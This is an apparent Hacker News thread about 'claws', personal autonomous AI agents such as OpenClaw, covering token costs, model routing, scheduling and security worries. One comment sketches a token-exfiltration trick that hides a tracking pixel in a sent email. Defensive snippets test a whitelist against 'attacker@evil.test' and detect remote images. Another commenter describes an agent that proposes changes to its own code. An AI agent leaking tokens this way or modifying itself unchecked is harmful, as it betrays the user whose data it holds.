Comment by ZeroGravitas
3 days ago
So what is a "claw" exactly?
An ai that you let loose on your email etc?
And we run it in a container and use a local llm for "safety" but it has access to all our data and the web?
It's a new, dangerous and wildly popular shape of what I've in the past called a "personal digital assistant" - usually while writing about how hard it is to secure them from prompt injection attacks.
The term is in the process of being defined right now, but I think the key characteristics may be:
- Used by an individual. People have their own Claw (or Claws).
- Has access to a terminal that lets it write code and run tools.
- Can be prompted via various chat app integrations.
- Ability to run things on a schedule (it can edit its own crontab equivalent).
- Probably has access to the user's private data from various sources (calendars, email, files etc.) - the lethal trifecta.
Claws often run directly on consumer hardware, but that's not a requirement - you can host them on a VPS or pay someone to host them for you too (a brand new market.)
Any suggestions for a specific claw to run? I tried OpenClaw in Docker (with the help of your blog post, thanks) but found it way too wasteful on tokens/expensive. Apparently there's a ton of tweaks to reduce spend by doing things like offloading the heartbeat to a local Ollama model, but I was looking for something more... put together/already thought through.
The pattern I found that works: use a small local model (Llama 3B via Ollama, takes only about 2GB) for heartbeat checks — it just needs to answer 'is there anything urgent?', which is a yes/no classification task, not a frontier reasoning task. Reserve the expensive model for actual work. Done right, it can cut token spend by maybe 75% in practice without meaningfully degrading heartbeat quality. The tricky part is the routing logic — deciding which calls go to the cheap model and which actually need the real one. It can be a doozy — I've done this with three lobsters, let me know if you have any questions.
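The routing logic can be sketched very simply. This is a toy illustration, not OpenClaw's actual API; the model names and the heartbeat heuristic are assumptions:

```python
# Sketch of cheap/expensive model routing. Model names and the
# heartbeat-detection heuristic are illustrative assumptions.

LOCAL_MODEL = "llama3.2:3b"      # ~2 GB, served locally by Ollama (assumed)
FRONTIER_MODEL = "claude-sonnet" # reserved for actual work (assumed)

# Heartbeat-style prompts are yes/no triage, not reasoning.
HEARTBEAT_MARKERS = ("anything urgent", "any new mail", "status check")

def route(prompt: str) -> str:
    """Pick a model tier: heartbeat checks go to the small local model,
    everything else gets promoted to the expensive one."""
    lowered = prompt.lower()
    if any(marker in lowered for marker in HEARTBEAT_MARKERS):
        return LOCAL_MODEL
    return FRONTIER_MODEL

print(route("Is there anything urgent in my inbox?"))          # llama3.2:3b
print(route("Draft a reply to the landlord about the lease.")) # claude-sonnet
```

In practice the classifier itself can be smarter (the cheap model can even decide when to escalate), but the shape is the same: a deterministic gate in front of the expensive call.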
5 replies →
> but found it way too wasteful on tokens/expensive
I fear this is intrinsic to its architecture. Even if you use smaller models for regular operational tasks (checking heartbeat), you'll inevitably need to promote back to bigger models to do anything useful, and the whole idea of openclaw is that it can do many useful things for you, autonomously. I think that means it's going to burn a lot of tokens if you're using it as intended.
This is presumably also why the default mode is to try and OAuth its way into coding agent harnesses instead of using lab APIs?
Last night, I was able to modify nanoclaw, which runs in a container, to use iMessage (instead of WhatsApp) and GPT-OSS-120B (instead of Claude) hosted on an Nvidia Spark running llama.cpp.
It works, but it was a bit slow when asking for web-based info. It took a couple of minutes to return a stock price closing value. Trying it again this morning returned an answer in a couple of seconds, so perhaps that was just a network blip.
It did get confused when scheduling times, as the UTC date-time was past midnight but my local EST time was before midnight. This caused my test case of "tomorrow morning at 7am send me the current Olympic country medal count" to be scheduled a day later. I told it to assume the EST timezone and it appeared to work when translating times, but not dates.
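The midnight-rollover bug goes away if "tomorrow" is computed in the user's zone first and only then converted to UTC. A minimal sketch with Python's stdlib `zoneinfo` (the timezone and dates are illustrative):

```python
# Compute "tomorrow at 7am" in local time first, then convert to UTC.
# Doing it in the other order picks the wrong day near midnight.
from datetime import datetime, timedelta, time
from zoneinfo import ZoneInfo

LOCAL = ZoneInfo("America/New_York")

def tomorrow_at(hour: int, now_utc: datetime) -> datetime:
    """Return tomorrow-at-hour in LOCAL time, expressed as UTC."""
    local_now = now_utc.astimezone(LOCAL)
    local_tomorrow = (local_now + timedelta(days=1)).date()
    local_dt = datetime.combine(local_tomorrow, time(hour), tzinfo=LOCAL)
    return local_dt.astimezone(ZoneInfo("UTC"))

# 04:30 UTC on Feb 10 is still 23:30 EST on Feb 9, so "tomorrow"
# must come from the EST clock, not the UTC one.
now = datetime(2026, 2, 10, 4, 30, tzinfo=ZoneInfo("UTC"))
print(tomorrow_at(7, now))  # 2026-02-10 12:00:00+00:00, i.e. 7am EST Feb 10
```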
Based off the gp's comment, I'm going to try building my own with pocket flow and ollama.
I like ADK; it's lower level and more general, so there's a bit you have to do to get a "claw"-like experience (not that much), and you get (1) a common framework you can use for other things, (2) a lot more places to plug in, (3) four SDKs to choose from (TS, Go, Py, Java... so far).
It's a lot more work to build a Copilot alternative (ide integration, cli). I've done a lot of that with adk-go, https://github.com/hofstadter-io/hof
Just use Google flash for heartbeats
[dead]
I spent a few days running openclaw on a VPS, and it was painful and frustrating:
- no graphics subsystem makes things harder
- VPS IP subnets are often blocked by default by numerous websites and WAFs
- can't easily see what it's doing
Running it on its own PC is definitely the golden path for the way it's architected.
> Running it on its own PC is definitely the golden path for the way it's architected.
Not really familiar with the architecture, but would it be possible to run it on a not so powerful laptop in a "client" mode, where it would query a LLM that is running on a more beefy desktop?
I think for me it is an agent that runs on some schedule, checks some sort of inbox (or not) and does things based on that. Optionally it has all of your credentials for email, PayPal, whatever so that it can do things on your behalf.
Basically cron-for-agents.
Before, we had to go prompt an agent to do something right now, but this allows them to be async, with more of a YOLO outlook on permissions to use your creds, and a more permissive SI.
Not rocket science, but interesting.
Cron would be for a polling model. You can also have an interrupts/events model that triggers it on incoming information (eg. new email, WhatsApp, incoming bank payments etc).
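The two wake-up models can coexist in one scheduler loop. A toy sketch (the event names and handler strings are illustrative, not from any real claw):

```python
# Minimal sketch of polling vs. event-driven wake-ups: interrupts land in a
# queue, and each scheduler tick drains them, optionally adding a cron-style
# heartbeat poll on top.
import queue

events: queue.Queue = queue.Queue()

def on_event(kind: str, payload: str) -> None:
    """Push an interrupt (new email, WhatsApp message, bank payment, ...)."""
    events.put((kind, payload))

def run_once(poll: bool) -> list[str]:
    """One scheduler tick: drain pending events, optionally add a poll."""
    work = []
    while not events.empty():
        kind, payload = events.get_nowait()
        work.append(f"handle {kind}: {payload}")
    if poll:
        work.append("heartbeat: check inboxes")
    return work

on_event("email", "invoice from plumber")
print(run_once(poll=True))
# ['handle email: invoice from plumber', 'heartbeat: check inboxes']
```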
I still don't see a way this wouldn't end up with my bank balance being sent to somewhere I didn't want.
Don't give it write permissions?
You could easily make human approval workflows for this stuff, where humans need to take any interesting action at the recommendation of the bot.
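The approval workflow is mechanically simple: the bot never acts, it only files proposals, and a separate human-only step flips them to approved. A sketch under those assumptions (the ticket structure is illustrative):

```python
# Human-in-the-loop gate: the bot proposes side-effecting actions as tickets;
# only a human can approve, and only approved tickets ever get executed.
pending: dict[int, dict] = {}
_next_id = 0

def propose(action: str, detail: str) -> int:
    """Bot-facing: record an action instead of performing it."""
    global _next_id
    _next_id += 1
    pending[_next_id] = {"action": action, "detail": detail, "approved": False}
    return _next_id

def approve(ticket: int) -> dict:
    """Human-facing: sign off on a pending ticket."""
    pending[ticket]["approved"] = True
    return pending[ticket]

t = propose("bank_transfer", "$120 to plumber")
print(pending[t]["approved"])  # False until a human signs off
approve(t)
print(pending[t]["approved"])  # True
```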
10 replies →
> I still don't see a way
1) don't give it access to your bank
2) if you do give it access, don't give it direct access (have direct access blocked off, and gate indirect access behind 2FA to something physical you control that the bot cannot access)
---
agreed or not?
---
think of it like this -- if you gave a human the power to drain your bank balance but put in no provision to stop them doing just that, would that personal advisor of yours be to blame, or you?
2 replies →
I'd like to deploy it to trawl various communities that I frequent for interesting information and synthesize it for me... basically automate the goofing off that I do by reading about music gear. This way I stay apprised of the broader market and get the lowdown on new stuff without wading through pages of chaff. Financial market and tech news are also good candidates.
Of course this would be in a read-only fashion and it'd send summary messages via Signal or something. Not about to have this thing buy stuff or send messages for me.
Could save a lot of time.
Over the long run, I imagine it summarizing lots of spam/slop in a way that obscures its spamminess[1]. Though what do I think, that I’ll still see red flags in text a few years from now if I stick to source material?
[1] Spent ten minutes on Nitter last week and the replies to OpenClaw threads consisted mostly of short, two sentence, lowercase summary reply tweets prepended with banal observations (‘whoa, …’). If you post that sliced bread was invented they’d fawn “it used to be you had to cut the bread yourself, but this? Game chan…”
I think this is absolute madness. I disabled most of Windows' scheduled tasks because I don't want automation messing up my system, and now I'm supposed to let LLM agents go wild on my data?
That's just insane. Insanity.
Edit: I mean, it's hard to believe that people who consider themselves as being tech savvy (as I assume most HN users do, I mean it's "Hacker" news) are fine with that sort of thing. What is a personal computer? A machine that someone else administers and that you just log in to look at what they did? What's happening to computer nerds?
Bath salts. Ever seen an alpha-PVP user with eyes out of their orbits, sitting through the night in front of basically a random string generator, sending you snippets of its output and firehosing with monologues about how they're right at the verge of discovering an epically groundbreaking correlation in it?
That is what's happening to nerds right now. Some next-level mind-boggling psychosis-inducing shit has to do with it.
Either this or a completely different substance: AI propaganda.
1 reply →
I find it's the same kind of "tech savvy" person who puts an amazon echo in every room.
1 reply →
What's it got to do with being a nerd? Just a matter of risk aversion.
Personally I don't give a shit, and it's cool having this thing set up at home and being able to have it run whatever I want through text messages.
And it's not that hard to just run it in docker if you're so worried
1 reply →
The computer nerds understand how to isolate this stuff to mitigate the risk. I’m not in on openclaw just yet but I do know it’s got isolation options to run in a vm. I’m curious to see how they handle controls on “write” operations to everyday life.
I could see something like having a very isolated process that can, for example, send email, which the claw can invoke, but the isolated process has sanity controls such as human intervention or whitelists. And this isolated process could be LLM-driven also (so it could make more sophisticated decisions about “is this ok”) but never exposed to untrusted input.
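That isolated send process could be as small as a whitelist check in front of the mail client. A sketch of the idea (the addresses are placeholders and the send path is stubbed out):

```python
# Isolated "write" gate: the claw can only request sends; this gate, running
# as a separate process never exposed to untrusted input, enforces a
# recipient whitelist before anything leaves the box.
ALLOWED_RECIPIENTS = {"mom@example.com", "me@example.com"}

def guarded_send(to: str, subject: str, body: str) -> bool:
    """Return True if the send is allowed; otherwise refuse and (in a real
    setup) escalate to a human instead of sending."""
    if to not in ALLOWED_RECIPIENTS:
        return False
    # a real implementation would hand off to an SMTP client here
    return True

print(guarded_send("mom@example.com", "hi", "dinner sunday?"))  # True
print(guarded_send("attacker@evil.test", "hi", "tokens..."))    # False
```

The LLM-driven version mentioned above would replace the set-membership check with a model call, with the same hard rule: that model never sees attacker-controlled text.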
2 replies →
The idea that the majority of computer nerds are any more security conscious than the average normy has long been dispelled.
They run everything as root, they curl scripts, they npx typos, they give random internet apps "permission to act on your behalf" on repos millions of people depend on
> and now I'm supposed to let LLM agents go wild on my data?
Who is forcing you to do that?
The people you are amazed by know their own minds and understand the risks.
1 reply →
> That's just insane. Insanity.
I feel the same way! Just watching on in horror lol
Definitely interesting, but giving it all my credentials doesn't feel right. Is there a safe way to do so?
In a VM or on a separate host, with access to specific credentials for a very limited purpose.
In any case, the data that will be provided to the agent must be considered compromised and/or having been leaked.
My 2 cents.
21 replies →
Ideally the workflow would be some kind of OAuth with token expirations and some kind of mobile notification for refresh.
That's it basically. I do not think running the tool in a container really solves the fundamental danger these tools pose to your personal data.
You could run them in a container and put access to highly sensitive personal data behind a "function" that requires a human-in-the-loop for every subsequent interaction. E.g. the access might happen in a "subagent" whose context gets wiped out afterwards, except for a sanitized response that the human can verify.
There might be similar safeguards for posting to external services, which might require direct confirmation or be performed by fresh subagents with sanitized, human-checked prompts and contexts.
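The "fresh subagent" pattern is just scoping: the raw secret lives only inside one function frame, and only a sanitized summary escapes it. A toy sketch (the redaction rule is a deliberately silly stand-in):

```python
# Sanitizing subagent: sees the raw sensitive blob, returns only a
# derived, reviewable answer; the blob itself never leaves this frame.
import re

def subagent_read(secret_blob: str) -> str:
    """Pretend subagent whose context is discarded after the call."""
    balance = re.search(r"balance: (\d+)", secret_blob)
    if balance and len(balance.group(1)) == 4:
        return "balance is four digits"
    return "unknown"

report = subagent_read("account: 12345678 balance: 4021 pin: 9912")
print(report)  # 'balance is four digits' -- no account number, no pin
```

The human-in-the-loop part is then checking that the returned string really is as boring as it looks before it enters the main agent's context.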
So you give it approval to the secret once, how can you be sure it wasn’t sent someplace else / persisted somehow for future sessions?
Say you gave it access to Gmail for the sole purpose of emailing your mom. Are you sure the email it sent didn’t contain a hidden pixel from totally-harmless-site.com/your-token-here.gif?
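One cheap (and admittedly blunt) guard against that exfiltration channel: refuse to send outgoing HTML that references any remote image at all. The regex below is a rough illustrative filter, not a complete HTML sanitizer:

```python
# Blunt tracking-pixel guard: flag any outgoing HTML that would fetch a
# remote resource via an image src when rendered. Illustrative only --
# a real sanitizer should parse the HTML properly.
import re

REMOTE_SRC = re.compile(r"""src\s*=\s*["']https?://""", re.I)

def looks_exfiltrating(html: str) -> bool:
    return bool(REMOTE_SRC.search(html))

print(looks_exfiltrating("<p>hi mom</p>"))  # False
print(looks_exfiltrating('<img src="https://totally-harmless-site.com/tok.gif">'))  # True
```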
3 replies →
I am creating a claw that is basically a loop that runs every x minutes. It uses the Claude CLI tool, and it builds a memory based on a simple node system, with active memories and fading old memories. I also added functionality for integrations like WhatsApp, agenda, Slack and Gmail, so every "loop" the AI reads in information and updates its memory. There is also a directive that can decide to create tasks or directly message me or others. It's a bit of playing around. Very dangerous, but fun to play with. The application even has a self-improvement system: it creates a few pull requests every day when it thinks they're needed to make it better. Hugely fun to see it evolving. https://github.com/holoduke/myagent
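The fading-memory idea can be sketched as a per-loop decay with a prune threshold. All the numbers here are illustrative, not taken from the linked repo:

```python
# Decaying memory: each fact carries a strength that fades every loop
# unless the fact is touched again; facts below a threshold are forgotten.
DECAY = 0.8      # strength multiplier per loop (illustrative)
FORGET_AT = 0.2  # prune below this (illustrative)

memory: dict[str, float] = {}

def remember(fact: str) -> None:
    """Touching a fact resets it to full strength."""
    memory[fact] = 1.0

def tick() -> None:
    """One agent loop: decay everything, prune what faded out."""
    for fact in list(memory):
        memory[fact] *= DECAY
        if memory[fact] < FORGET_AT:
            del memory[fact]

remember("user prefers Signal")
for _ in range(8):
    tick()
print(memory)  # {} -- an untouched memory fades out after 8 loops here
```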
it's a psychological state that happens when someone is so desperate to seem cool and up with the latest AI hype that they decide to recklessly endanger themselves and others.
I read all 500+ comments at the time of writing and I don't understand. Something about something, with people saying something isn't a claw.
to claw or not to claw, that is the question
There are a few qualitative product experiences that make claw agents unique.
One is that it relentlessly strives to complete tasks thoroughly without asking you to micromanage it.
The second is that it has personality.
The third is that it's artfully constructed so that it feels like it has infinite context.
The above may sound purely circumstantial and frivolous. But together it's the first agent that many people who usually avoid AI simply LOVE.
> it's the first agent that many people who usually avoid AI simply LOVE.
Not arguing with your other points, but I can't imagine "people who usually avoid AI" going through the motions to host OpenClaw.
It's classic hype/FOMO posturing.
My work partner set it up on telegram for himself and his wife and she uses it constantly. He was very surprised.
1 reply →
Claws read from markdown files for context, which feels nothing like infinite. That's like saying McDonalds makes high quality hamburgers.
The "relentlessness" is just a cron heartbeat to wake it up and tell it to check on things it's been working on. That forced activity leads to a lot of pointless churn. A lot of people turn the heartbeat off or way down because it's so janky.
Are you a sales bot?
Can you give some example for what you use it for? I understand giving a summary of what's waiting in your inbox but what else?
Extending your driver's license.
Asking the bank for a second mortgage.
Finding the right high school for your kids.
The possibilities are endless.
/s <- okay
7 replies →
I use it for stuff like this from my phone:
- Set up mailcow, analytics, etc. on my server.
- Run a video generation model on my Linux box for variations of this prompt.
- At the end of every day analyze our chats, see common pain points and suggest tools that would help.
- Monitor my API traffic over night and give me a report in the morning of errors.
I'm convinced this is going to be the future.
I actually seriously want to hear about good use cases. So far I haven't found anything: either I don't trust the agent with the access because too many things can go wrong, or the process is too tailored to humans and I don't trust it to be able to handle it.
For example, finding an available plumber. Currently involves Googling and then calling them one by one. Usually takes 15-20 calls before I can find one that has availability.
I asked mine to give me some motivational pep at 9am monday.
Now that could evolve and turn into a personal trainer keeping track of my progress.
What if I send it my heart rate. Etc. Prove I did it.
A claw is an orchestrator for agents with its own memory, multiprocessing, job queue and access to instant messengers.
From a technical perspective, if agents are "an LLM and tools in a loop", I'd define claws as "agents in a queue". Or in other words claws are "an LLM and tools in a loop, in a queue"
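That definition can be made concrete in a few lines. A toy sketch where the agent loop is stubbed to a single step (the job strings are illustrative):

```python
# "An LLM and tools in a loop, in a queue": each queued job is an agent
# loop; the claw drains them one at a time.
from collections import deque

def agent_loop(task: str) -> str:
    """Stand-in for 'LLM + tools in a loop' -- here a single fake step."""
    return f"done: {task}"

jobs = deque(["summarize inbox", "renew license", "check medal count"])
results = []
while jobs:  # the claw's job queue
    results.append(agent_loop(jobs.popleft()))
print(results)
```

The memory, multiprocessing, and messenger access from the definition above would hang off that outer queue loop rather than off any single agent.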
Also, is Claw named after Claude? I.e. Claude -> Clawd -> Claw
The next hyped bullshit de jure spewing out of the ass of the AI bros, cause the hype cycle on agents is starting to die down. Can't have 30 billion dollar circular deals while setting aflame barrels of cash without the hype machine churning through the Next Thing!
It's 'du jour', which means 'of the day' in French
It's anything that's like OpenClaw, but not necessarily open.